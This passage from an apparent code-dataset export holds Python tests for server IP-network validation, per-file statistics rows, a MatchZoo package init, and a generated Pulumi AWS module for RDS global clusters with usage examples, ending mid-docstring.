server = self._get_server('network')
server['intern_ip'] = '10.0.0.0/30'
server['ip_config'] = '10.0.1.0/30'
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_with_invalid_value(self):
server = self._get_server('host')
server['intern_ip'] = '10.0.0.0/30'
server['ip_config'] = 'nonsense'
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_invalid_network(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.0/16'
server['ip_config'] = '10.0.1.5/28' # Invalid: Has host bits set
with self.assertRaises(ValidationError):
server.commit(user=User.objects.first())
def test_server_with_ip_address(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.1/32' # Just a very small network
server['ip_config'] = '10.0.1.0/32' # Just a very small network
self.assertIsNone(server.commit(user=User.objects.first()))
def test_server_network_overlaps(self):
first = self._get_server('network')
first['intern_ip'] = '10.0.0.0/30'
first['ip_config'] = '10.0.1.0/30'
first.commit(user=User.objects.first())
overlaps = self._get_server('network')
overlaps['intern_ip'] = '10.0.3.0/30'
overlaps['ip_config'] = '10.0.1.0/28'
with self.assertRaises(ValidationError):
overlaps.commit(user=User.objects.first())
def test_server_network_overlaps_intern_ip(self):
first = self._get_server('network')
first['intern_ip'] = '10.0.0.0/30'
first.commit(user=User.objects.first())
overlaps = self._get_server('network')
overlaps['intern_ip'] = '10.0.1.0/28'
overlaps['ip_config'] = '10.0.0.0/28'
with self.assertRaises(ValidationError):
overlaps.commit(user=User.objects.first())
def test_server_network_is_equal(self):
first = self._get_server('network')
first['intern_ip'] = '10.0.0.0/30'
first['ip_config'] = '10.0.1.0/30'
first.commit(user=User.objects.first())
equal = self._get_server('network')
equal['intern_ip'] = '10.0.2.0/30'
equal['ip_config'] = '10.0.1.0/30'
with self.assertRaises(ValidationError):
equal.commit(user=User.objects.first())
def test_server_network_overlaps_other_servertype(self):
first = self._get_server('network')
first['intern_ip'] = '10.0.0.0/30'
first['ip_config'] = '10.0.1.0/30'
first.commit(user=User.objects.first())
# A network can overlap with networks of other servertypes
overlaps = self._get_server('other_network')
overlaps['intern_ip'] = '10.0.0.0/28'
overlaps['ip_config'] = '10.0.1.0/30'
self.assertIsNone(overlaps.commit(user=User.objects.first()))
def test_server_with_duplicate_inet_different_attrs(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.0/30'
server['ip_config'] = '10.0.1.0/30'
server.commit(user=User.objects.first())
duplicate = self._get_server('network')
duplicate['intern_ip'] = '10.0.2.0/30'
duplicate['ip_config_new'] = '10.0.1.0/30'
with self.assertRaises(ValidationError):
duplicate.commit(user=User.objects.first())
def test_change_server_hostname(self):
server = self._get_server('network')
server['intern_ip'] = '10.0.0.0/30'
server['ip_config'] = '10.0.1.0/30'
server.commit(user=User.objects.first())
to_rename = Query({'hostname': server['hostname']}, ['hostname'])
to_rename.update(hostname=self.faker.hostname())
self.assertIsNone(to_rename.commit(user=User.objects.first()))
| 38.577821
| 75
| 0.649453
| 2,584
| 19,829
| 4.785604
| 0.060372
| 0.016659
| 0.025877
| 0.129064
| 0.870532
| 0.864871
| 0.861718
| 0.846191
| 0.84053
| 0.831959
| 0
| 0.044467
| 0.206112
| 19,829
| 513
| 76
| 38.653021
| 0.741075
| 0.059156
| 0
| 0.815789
| 0
| 0
| 0.151008
| 0
| 0
| 0
| 0
| 0.001949
| 0.136842
| 1
| 0.144737
| false
| 0
| 0.023684
| 0
| 0.197368
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
131ac4acbf211f2e29e13ea5e6c5b822d97ad197
| 302
|
py
|
Python
|
build/lib/matchzoo/utils/__init__.py
|
ChangQF/MatchZoo
|
991bdbad1e5166870fd4051646d7834a337d0709
|
[
"Apache-2.0"
] | 1
|
2019-05-02T10:16:08.000Z
|
2019-05-02T10:16:08.000Z
|
build/lib/matchzoo/utils/__init__.py
|
ChangQF/MatchZoo
|
991bdbad1e5166870fd4051646d7834a337d0709
|
[
"Apache-2.0"
] | null | null | null |
build/lib/matchzoo/utils/__init__.py
|
ChangQF/MatchZoo
|
991bdbad1e5166870fd4051646d7834a337d0709
|
[
"Apache-2.0"
] | 2
|
2018-04-10T11:33:41.000Z
|
2019-07-25T02:10:13.000Z
|
# note:
from .rank_io import read_word_dict
from .rank_io import read_embedding
from .rank_io import read_data_old_version
from .rank_io import read_relation
from .rank_io import read_data
from .rank_io import convert_embed_2_numpy
from .utility import import_class
from .utility import import_object
| 30.2
| 42
| 0.850993
| 52
| 302
| 4.576923
| 0.384615
| 0.201681
| 0.252101
| 0.403361
| 0.453782
| 0.201681
| 0
| 0
| 0
| 0
| 0
| 0.003745
| 0.115894
| 302
| 9
| 43
| 33.555556
| 0.88764
| 0.016556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
133d4c70bb777b1a6641a31f47df1cacd4214ee1
| 132
|
py
|
Python
|
setup/python_setup.py
|
ioAndzl/Ansible
|
6ded80b455f380b2d251368eaafcef5516e4e654
|
[
"MIT"
] | null | null | null |
setup/python_setup.py
|
ioAndzl/Ansible
|
6ded80b455f380b2d251368eaafcef5516e4e654
|
[
"MIT"
] | null | null | null |
setup/python_setup.py
|
ioAndzl/Ansible
|
6ded80b455f380b2d251368eaafcef5516e4e654
|
[
"MIT"
] | null | null | null |
"""
#windows
sudo python3 -m pip install -U pip
sudo python3 -m pip install -U setuptools
#linux
pip install -U pip setuptools
"""
| 16.5
| 41
| 0.719697
| 21
| 132
| 4.52381
| 0.428571
| 0.315789
| 0.347368
| 0.315789
| 0.484211
| 0.484211
| 0
| 0
| 0
| 0
| 0
| 0.018519
| 0.181818
| 132
| 8
| 42
| 16.5
| 0.861111
| 0.931818
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b99bacc9e9a629e5397fd57ceb047319259961d8
| 45,525
|
py
|
Python
|
sdk/python/pulumi_aws/rds/global_cluster.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/rds/global_cluster.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/rds/global_cluster.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['GlobalClusterArgs', 'GlobalCluster']
@pulumi.input_type
class GlobalClusterArgs:
def __init__(__self__, *,
global_cluster_identifier: pulumi.Input[str],
database_name: Optional[pulumi.Input[str]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a GlobalCluster resource.
:param pulumi.Input[str] global_cluster_identifier: The global cluster identifier.
:param pulumi.Input[str] database_name: Name for an automatically created database on cluster creation.
:param pulumi.Input[bool] deletion_protection: If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
:param pulumi.Input[str] engine: Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
:param pulumi.Input[str] engine_version: Engine version of the Aurora global database.
* **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
:param pulumi.Input[bool] force_destroy: Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
:param pulumi.Input[str] source_db_cluster_identifier: Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
:param pulumi.Input[bool] storage_encrypted: Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
"""
pulumi.set(__self__, "global_cluster_identifier", global_cluster_identifier)
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if deletion_protection is not None:
pulumi.set(__self__, "deletion_protection", deletion_protection)
if engine is not None:
pulumi.set(__self__, "engine", engine)
if engine_version is not None:
pulumi.set(__self__, "engine_version", engine_version)
if force_destroy is not None:
pulumi.set(__self__, "force_destroy", force_destroy)
if source_db_cluster_identifier is not None:
pulumi.set(__self__, "source_db_cluster_identifier", source_db_cluster_identifier)
if storage_encrypted is not None:
pulumi.set(__self__, "storage_encrypted", storage_encrypted)
@property
@pulumi.getter(name="globalClusterIdentifier")
def global_cluster_identifier(self) -> pulumi.Input[str]:
"""
The global cluster identifier.
"""
return pulumi.get(self, "global_cluster_identifier")
@global_cluster_identifier.setter
def global_cluster_identifier(self, value: pulumi.Input[str]):
pulumi.set(self, "global_cluster_identifier", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name for an automatically created database on cluster creation.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> Optional[pulumi.Input[bool]]:
"""
If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
"""
return pulumi.get(self, "deletion_protection")
@deletion_protection.setter
def deletion_protection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deletion_protection", value)
@property
@pulumi.getter
def engine(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="engineVersion")
def engine_version(self) -> Optional[pulumi.Input[str]]:
"""
Engine version of the Aurora global database.
* **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
"""
return pulumi.get(self, "engine_version")
@engine_version.setter
def engine_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_version", value)
@property
@pulumi.getter(name="forceDestroy")
def force_destroy(self) -> Optional[pulumi.Input[bool]]:
"""
Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
"""
return pulumi.get(self, "force_destroy")
@force_destroy.setter
def force_destroy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_destroy", value)
@property
@pulumi.getter(name="sourceDbClusterIdentifier")
def source_db_cluster_identifier(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
"""
return pulumi.get(self, "source_db_cluster_identifier")
@source_db_cluster_identifier.setter
def source_db_cluster_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_db_cluster_identifier", value)
@property
@pulumi.getter(name="storageEncrypted")
def storage_encrypted(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
"""
return pulumi.get(self, "storage_encrypted")
@storage_encrypted.setter
def storage_encrypted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "storage_encrypted", value)
@pulumi.input_type
class _GlobalClusterState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
database_name: Optional[pulumi.Input[str]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
global_cluster_identifier: Optional[pulumi.Input[str]] = None,
global_cluster_members: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalClusterGlobalClusterMemberArgs']]]] = None,
global_cluster_resource_id: Optional[pulumi.Input[str]] = None,
source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering GlobalCluster resources.
:param pulumi.Input[str] arn: RDS Global Cluster Amazon Resource Name (ARN)
:param pulumi.Input[str] database_name: Name for an automatically created database on cluster creation.
:param pulumi.Input[bool] deletion_protection: If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
:param pulumi.Input[str] engine: Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
:param pulumi.Input[str] engine_version: Engine version of the Aurora global database.
* **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
:param pulumi.Input[bool] force_destroy: Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
:param pulumi.Input[str] global_cluster_identifier: The global cluster identifier.
:param pulumi.Input[Sequence[pulumi.Input['GlobalClusterGlobalClusterMemberArgs']]] global_cluster_members: Set of objects containing Global Cluster members.
:param pulumi.Input[str] global_cluster_resource_id: AWS Region-unique, immutable identifier for the global database cluster. This identifier is found in AWS CloudTrail log entries whenever the AWS KMS key for the DB cluster is accessed
:param pulumi.Input[str] source_db_cluster_identifier: Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
:param pulumi.Input[bool] storage_encrypted: Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if deletion_protection is not None:
pulumi.set(__self__, "deletion_protection", deletion_protection)
if engine is not None:
pulumi.set(__self__, "engine", engine)
if engine_version is not None:
pulumi.set(__self__, "engine_version", engine_version)
if force_destroy is not None:
pulumi.set(__self__, "force_destroy", force_destroy)
if global_cluster_identifier is not None:
pulumi.set(__self__, "global_cluster_identifier", global_cluster_identifier)
if global_cluster_members is not None:
pulumi.set(__self__, "global_cluster_members", global_cluster_members)
if global_cluster_resource_id is not None:
pulumi.set(__self__, "global_cluster_resource_id", global_cluster_resource_id)
if source_db_cluster_identifier is not None:
pulumi.set(__self__, "source_db_cluster_identifier", source_db_cluster_identifier)
if storage_encrypted is not None:
pulumi.set(__self__, "storage_encrypted", storage_encrypted)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
RDS Global Cluster Amazon Resource Name (ARN)
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Optional[pulumi.Input[str]]:
"""
Name for an automatically created database on cluster creation.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> Optional[pulumi.Input[bool]]:
"""
If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
"""
return pulumi.get(self, "deletion_protection")
@deletion_protection.setter
def deletion_protection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deletion_protection", value)
@property
@pulumi.getter
def engine(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
"""
return pulumi.get(self, "engine")
@engine.setter
def engine(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine", value)
@property
@pulumi.getter(name="engineVersion")
def engine_version(self) -> Optional[pulumi.Input[str]]:
"""
Engine version of the Aurora global database.
* **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
"""
return pulumi.get(self, "engine_version")
@engine_version.setter
def engine_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_version", value)
@property
@pulumi.getter(name="forceDestroy")
def force_destroy(self) -> Optional[pulumi.Input[bool]]:
"""
Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
"""
return pulumi.get(self, "force_destroy")
@force_destroy.setter
def force_destroy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_destroy", value)
@property
@pulumi.getter(name="globalClusterIdentifier")
def global_cluster_identifier(self) -> Optional[pulumi.Input[str]]:
"""
The global cluster identifier.
"""
return pulumi.get(self, "global_cluster_identifier")
@global_cluster_identifier.setter
def global_cluster_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "global_cluster_identifier", value)
@property
@pulumi.getter(name="globalClusterMembers")
def global_cluster_members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalClusterGlobalClusterMemberArgs']]]]:
"""
Set of objects containing Global Cluster members.
"""
return pulumi.get(self, "global_cluster_members")
@global_cluster_members.setter
def global_cluster_members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalClusterGlobalClusterMemberArgs']]]]):
pulumi.set(self, "global_cluster_members", value)
@property
@pulumi.getter(name="globalClusterResourceId")
def global_cluster_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
AWS Region-unique, immutable identifier for the global database cluster. This identifier is found in AWS CloudTrail log entries whenever the AWS KMS key for the DB cluster is accessed
"""
return pulumi.get(self, "global_cluster_resource_id")
@global_cluster_resource_id.setter
def global_cluster_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "global_cluster_resource_id", value)
@property
@pulumi.getter(name="sourceDbClusterIdentifier")
def source_db_cluster_identifier(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
"""
return pulumi.get(self, "source_db_cluster_identifier")
@source_db_cluster_identifier.setter
def source_db_cluster_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_db_cluster_identifier", value)
@property
@pulumi.getter(name="storageEncrypted")
def storage_encrypted(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
"""
return pulumi.get(self, "storage_encrypted")
@storage_encrypted.setter
def storage_encrypted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "storage_encrypted", value)
class GlobalCluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database_name: Optional[pulumi.Input[str]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
engine: Optional[pulumi.Input[str]] = None,
engine_version: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
global_cluster_identifier: Optional[pulumi.Input[str]] = None,
source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
storage_encrypted: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Manages an RDS Global Cluster, which is an Aurora global database spread across multiple regions. The global database contains a single primary cluster with read-write capability, and a read-only secondary cluster that receives data from the primary cluster through high-speed replication performed by the Aurora storage subsystem.
More information about Aurora global databases can be found in the [Aurora User Guide](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-global-database.html#aurora-global-database-creating).
## Example Usage
### New MySQL Global Cluster
```python
import pulumi
import pulumi_aws as aws
example = aws.rds.GlobalCluster("example",
global_cluster_identifier="global-test",
engine="aurora",
engine_version="5.6.mysql_aurora.1.22.2",
database_name="example_db")
primary_cluster = aws.rds.Cluster("primaryCluster",
engine=example.engine,
engine_version=example.engine_version,
cluster_identifier="test-primary-cluster",
master_username="username",
master_password="somepass123",
database_name="example_db",
global_cluster_identifier=example.id,
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["primary"]))
primary_cluster_instance = aws.rds.ClusterInstance("primaryClusterInstance",
engine=example.engine,
engine_version=example.engine_version,
identifier="test-primary-cluster-instance",
cluster_identifier=primary_cluster.id,
instance_class="db.r4.large",
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["primary"]))
secondary_cluster = aws.rds.Cluster("secondaryCluster",
engine=example.engine,
engine_version=example.engine_version,
cluster_identifier="test-secondary-cluster",
global_cluster_identifier=example.id,
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["secondary"]))
secondary_cluster_instance = aws.rds.ClusterInstance("secondaryClusterInstance",
engine=example.engine,
engine_version=example.engine_version,
identifier="test-secondary-cluster-instance",
cluster_identifier=secondary_cluster.id,
instance_class="db.r4.large",
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["secondary"],
depends_on=[primary_cluster_instance]))
```
### New PostgreSQL Global Cluster
```python
import pulumi
import pulumi_aws as aws
import pulumi_pulumi as pulumi
primary = pulumi.providers.Aws("primary", region="us-east-2")
secondary = pulumi.providers.Aws("secondary", region="us-east-1")
example = aws.rds.GlobalCluster("example",
global_cluster_identifier="global-test",
engine="aurora-postgresql",
engine_version="11.9",
database_name="example_db")
primary_cluster = aws.rds.Cluster("primaryCluster",
engine=example.engine,
engine_version=example.engine_version,
cluster_identifier="test-primary-cluster",
master_username="username",
master_password="somepass123",
database_name="example_db",
global_cluster_identifier=example.id,
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["primary"]))
primary_cluster_instance = aws.rds.ClusterInstance("primaryClusterInstance",
engine=example.engine,
engine_version=example.engine_version,
identifier="test-primary-cluster-instance",
cluster_identifier=primary_cluster.id,
instance_class="db.r4.large",
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["primary"]))
secondary_cluster = aws.rds.Cluster("secondaryCluster",
engine=example.engine,
engine_version=example.engine_version,
cluster_identifier="test-secondary-cluster",
global_cluster_identifier=example.id,
skip_final_snapshot=True,
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["secondary"],
depends_on=[primary_cluster_instance]))
secondary_cluster_instance = aws.rds.ClusterInstance("secondaryClusterInstance",
engine=example.engine,
engine_version=example.engine_version,
identifier="test-secondary-cluster-instance",
cluster_identifier=secondary_cluster.id,
instance_class="db.r4.large",
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["secondary"]))
```
### New Global Cluster From Existing DB Cluster
```python
import pulumi
import pulumi_aws as aws
# ... other configuration ...
example_cluster = aws.rds.Cluster("exampleCluster")
example_global_cluster = aws.rds.GlobalCluster("exampleGlobalCluster",
force_destroy=True,
global_cluster_identifier="example",
source_db_cluster_identifier=example_cluster.arn)
```
## Import
`aws_rds_global_cluster` can be imported by using the RDS Global Cluster identifier, e.g.,
```sh
$ pulumi import aws:rds/globalCluster:GlobalCluster example example
```
Certain resource arguments, like `force_destroy`, only exist within this provider. If the argument is set in the the provider configuration on an imported resource, This provider will show a difference on the first plan after import to update the state value. This change is safe to apply immediately so the state matches the desired configuration. Certain resource arguments, like `source_db_cluster_identifier`, do not have an API method for reading the information after creation. If the argument is set in the provider configuration on an imported resource, the provider will always show a difference. To workaround this behavior, either omit the argument from the the provider configuration or use `ignore_changes` to hide the difference, e.g. terraform resource "aws_rds_global_cluster" "example" {
# ... other configuration ...
# There is no API for reading source_db_cluster_identifier
lifecycle {
ignore_changes = [source_db_cluster_identifier]
} }
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] database_name: Name for an automatically created database on cluster creation.
:param pulumi.Input[bool] deletion_protection: If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
:param pulumi.Input[str] engine: Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
:param pulumi.Input[str] engine_version: Engine version of the Aurora global database.
* **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
:param pulumi.Input[bool] force_destroy: Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
:param pulumi.Input[str] global_cluster_identifier: The global cluster identifier.
:param pulumi.Input[str] source_db_cluster_identifier: Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
:param pulumi.Input[bool] storage_encrypted: Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GlobalClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an RDS Global Cluster, which is an Aurora global database spread across multiple regions. The global database contains a single primary cluster with read-write capability, and a read-only secondary cluster that receives data from the primary cluster through high-speed replication performed by the Aurora storage subsystem.
More information about Aurora global databases can be found in the [Aurora User Guide](https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/aurora-global-database.html#aurora-global-database-creating).
## Example Usage
### New MySQL Global Cluster
```python
import pulumi
import pulumi_aws as aws
example = aws.rds.GlobalCluster("example",
global_cluster_identifier="global-test",
engine="aurora",
engine_version="5.6.mysql_aurora.1.22.2",
database_name="example_db")
primary_cluster = aws.rds.Cluster("primaryCluster",
engine=example.engine,
engine_version=example.engine_version,
cluster_identifier="test-primary-cluster",
master_username="username",
master_password="somepass123",
database_name="example_db",
global_cluster_identifier=example.id,
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["primary"]))
primary_cluster_instance = aws.rds.ClusterInstance("primaryClusterInstance",
engine=example.engine,
engine_version=example.engine_version,
identifier="test-primary-cluster-instance",
cluster_identifier=primary_cluster.id,
instance_class="db.r4.large",
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["primary"]))
secondary_cluster = aws.rds.Cluster("secondaryCluster",
engine=example.engine,
engine_version=example.engine_version,
cluster_identifier="test-secondary-cluster",
global_cluster_identifier=example.id,
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["secondary"]))
secondary_cluster_instance = aws.rds.ClusterInstance("secondaryClusterInstance",
engine=example.engine,
engine_version=example.engine_version,
identifier="test-secondary-cluster-instance",
cluster_identifier=secondary_cluster.id,
instance_class="db.r4.large",
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["secondary"],
depends_on=[primary_cluster_instance]))
```
### New PostgreSQL Global Cluster
```python
import pulumi
import pulumi_aws as aws
import pulumi_pulumi as pulumi
primary = pulumi.providers.Aws("primary", region="us-east-2")
secondary = pulumi.providers.Aws("secondary", region="us-east-1")
example = aws.rds.GlobalCluster("example",
global_cluster_identifier="global-test",
engine="aurora-postgresql",
engine_version="11.9",
database_name="example_db")
primary_cluster = aws.rds.Cluster("primaryCluster",
engine=example.engine,
engine_version=example.engine_version,
cluster_identifier="test-primary-cluster",
master_username="username",
master_password="somepass123",
database_name="example_db",
global_cluster_identifier=example.id,
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["primary"]))
primary_cluster_instance = aws.rds.ClusterInstance("primaryClusterInstance",
engine=example.engine,
engine_version=example.engine_version,
identifier="test-primary-cluster-instance",
cluster_identifier=primary_cluster.id,
instance_class="db.r4.large",
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["primary"]))
secondary_cluster = aws.rds.Cluster("secondaryCluster",
engine=example.engine,
engine_version=example.engine_version,
cluster_identifier="test-secondary-cluster",
global_cluster_identifier=example.id,
skip_final_snapshot=True,
db_subnet_group_name="default",
opts=pulumi.ResourceOptions(provider=aws["secondary"],
depends_on=[primary_cluster_instance]))
